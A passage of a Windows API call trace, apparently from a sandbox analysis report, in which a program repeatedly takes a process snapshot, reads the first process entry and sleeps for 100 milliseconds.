cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.765] Sleep (dwMilliseconds=0x64) [0239.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x478 [0239.867] Process32FirstW (in: hSnapshot=0x478, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.873] Sleep (dwMilliseconds=0x64) [0240.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x47c [0240.069] Process32FirstW (in: hSnapshot=0x47c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.074] Sleep (dwMilliseconds=0x64) [0240.176] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x480 [0240.178] Process32FirstW (in: hSnapshot=0x480, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.183] Sleep (dwMilliseconds=0x64) [0240.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x484 [0240.287] Process32FirstW (in: hSnapshot=0x484, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.293] Sleep (dwMilliseconds=0x64) [0240.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x488 [0240.396] Process32FirstW (in: hSnapshot=0x488, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.402] Sleep (dwMilliseconds=0x64) [0240.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x48c [0240.505] Process32FirstW (in: hSnapshot=0x48c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.511] Sleep (dwMilliseconds=0x64) [0240.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x490 [0240.615] Process32FirstW (in: hSnapshot=0x490, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.621] Sleep (dwMilliseconds=0x64) [0240.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x494 [0240.725] Process32FirstW (in: hSnapshot=0x494, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.731] Sleep (dwMilliseconds=0x64) [0240.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x498 [0240.833] Process32FirstW (in: hSnapshot=0x498, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.838] Sleep (dwMilliseconds=0x64) [0240.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x49c [0240.943] Process32FirstW (in: hSnapshot=0x49c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.948] Sleep (dwMilliseconds=0x64) [0241.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4a0 [0241.054] Process32FirstW (in: hSnapshot=0x4a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.060] Sleep (dwMilliseconds=0x64) [0241.160] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4a4 [0241.161] Process32FirstW (in: hSnapshot=0x4a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.167] Sleep (dwMilliseconds=0x64) [0241.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4a8 [0241.270] Process32FirstW (in: hSnapshot=0x4a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.275] Sleep (dwMilliseconds=0x64) [0241.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4ac [0241.379] Process32FirstW (in: hSnapshot=0x4ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.385] Sleep (dwMilliseconds=0x64) [0241.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4b0 [0241.488] Process32FirstW (in: hSnapshot=0x4b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.494] Sleep (dwMilliseconds=0x64) [0241.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4b4 [0241.597] Process32FirstW (in: hSnapshot=0x4b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.603] Sleep (dwMilliseconds=0x64) [0241.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4b8 [0241.708] Process32FirstW (in: hSnapshot=0x4b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.714] Sleep (dwMilliseconds=0x64) [0241.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4bc [0241.816] Process32FirstW (in: hSnapshot=0x4bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.822] Sleep (dwMilliseconds=0x64) [0241.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c0 [0241.925] Process32FirstW (in: hSnapshot=0x4c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.931] Sleep (dwMilliseconds=0x64) [0242.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c4 [0242.034] Process32FirstW (in: hSnapshot=0x4c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.041] Sleep (dwMilliseconds=0x64) [0242.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c8 [0242.144] Process32FirstW (in: hSnapshot=0x4c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.150] Sleep (dwMilliseconds=0x64) [0242.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4cc [0242.263] Process32FirstW (in: hSnapshot=0x4cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.268] Sleep (dwMilliseconds=0x64) [0242.384] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4d0 [0242.386] Process32FirstW (in: hSnapshot=0x4d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.393] Sleep (dwMilliseconds=0x64) [0242.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4d4 [0242.503] Process32FirstW (in: hSnapshot=0x4d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.509] Sleep (dwMilliseconds=0x64) [0242.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4d8 [0242.611] Process32FirstW (in: hSnapshot=0x4d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.617] Sleep (dwMilliseconds=0x64) [0242.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4dc [0242.721] Process32FirstW (in: hSnapshot=0x4dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.727] Sleep (dwMilliseconds=0x64) [0242.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4e0 [0242.830] Process32FirstW (in: hSnapshot=0x4e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.835] Sleep (dwMilliseconds=0x64) [0242.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4e4 [0242.939] Process32FirstW (in: hSnapshot=0x4e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.945] Sleep (dwMilliseconds=0x64) [0243.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4e8 [0243.051] Process32FirstW (in: hSnapshot=0x4e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.057] Sleep (dwMilliseconds=0x64) [0243.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4ec [0243.158] Process32FirstW (in: hSnapshot=0x4ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.163] Sleep (dwMilliseconds=0x64) [0243.275] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4f0 [0243.276] Process32FirstW (in: hSnapshot=0x4f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.282] Sleep (dwMilliseconds=0x64) [0243.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4f4 [0243.393] Process32FirstW (in: hSnapshot=0x4f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.398] Sleep (dwMilliseconds=0x64) [0243.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4f8 [0243.501] Process32FirstW (in: hSnapshot=0x4f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.506] Sleep (dwMilliseconds=0x64) [0243.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fc [0243.610] Process32FirstW (in: hSnapshot=0x4fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.616] Sleep (dwMilliseconds=0x64) [0243.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x500 [0243.719] Process32FirstW (in: hSnapshot=0x500, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.726] Sleep (dwMilliseconds=0x64) [0243.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x504 [0243.828] Process32FirstW (in: hSnapshot=0x504, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.834] Sleep (dwMilliseconds=0x64) [0243.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x508 [0243.938] Process32FirstW (in: hSnapshot=0x508, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.944] Sleep (dwMilliseconds=0x64) [0244.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x50c [0244.049] Process32FirstW (in: hSnapshot=0x50c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.055] Sleep (dwMilliseconds=0x64) [0244.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x510 [0244.157] Process32FirstW (in: hSnapshot=0x510, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.164] Sleep (dwMilliseconds=0x64) [0244.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x514 [0244.266] Process32FirstW (in: hSnapshot=0x514, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.274] Sleep (dwMilliseconds=0x64) [0244.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x518 [0244.375] Process32FirstW (in: hSnapshot=0x518, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.384] Sleep (dwMilliseconds=0x64) [0244.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x51c [0244.484] Process32FirstW (in: hSnapshot=0x51c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.492] Sleep (dwMilliseconds=0x64) [0244.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0244.604] Process32FirstW (in: hSnapshot=0x520, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.612] Sleep (dwMilliseconds=0x64) [0244.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x524 [0244.718] Process32FirstW (in: hSnapshot=0x524, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.727] Sleep (dwMilliseconds=0x64) [0244.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x528 [0244.827] Process32FirstW (in: hSnapshot=0x528, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.835] Sleep (dwMilliseconds=0x64) [0244.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x52c [0244.942] Process32FirstW (in: hSnapshot=0x52c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.948] Sleep (dwMilliseconds=0x64) [0245.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x530 [0245.046] Process32FirstW (in: hSnapshot=0x530, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.052] Sleep (dwMilliseconds=0x64) [0245.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x534 [0245.155] Process32FirstW (in: hSnapshot=0x534, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.161] Sleep (dwMilliseconds=0x64) [0245.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x538 [0245.264] Process32FirstW (in: hSnapshot=0x538, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.269] Sleep (dwMilliseconds=0x64) [0245.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x53c [0245.373] Process32FirstW (in: hSnapshot=0x53c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.379] Sleep (dwMilliseconds=0x64) [0245.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x540 [0245.482] Process32FirstW (in: hSnapshot=0x540, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.488] Sleep (dwMilliseconds=0x64) [0245.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x544 [0245.593] Process32FirstW (in: hSnapshot=0x544, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.598] Sleep (dwMilliseconds=0x64) [0245.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x548 [0245.704] Process32FirstW (in: hSnapshot=0x548, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.710] Sleep (dwMilliseconds=0x64) [0246.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x54c [0246.469] Process32FirstW (in: hSnapshot=0x54c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.476] Sleep (dwMilliseconds=0x64) [0246.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x550 [0246.605] Process32FirstW (in: hSnapshot=0x550, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.611] Sleep (dwMilliseconds=0x64) [0246.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x554 [0246.777] Process32FirstW (in: hSnapshot=0x554, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.783] Sleep (dwMilliseconds=0x64) [0247.025] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x558 [0247.026] Process32FirstW (in: hSnapshot=0x558, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.032] Sleep (dwMilliseconds=0x64) [0247.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x55c [0247.141] Process32FirstW (in: hSnapshot=0x55c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.148] Sleep (dwMilliseconds=0x64) [0247.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x560 [0247.301] Process32FirstW (in: hSnapshot=0x560, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.312] Sleep (dwMilliseconds=0x64) 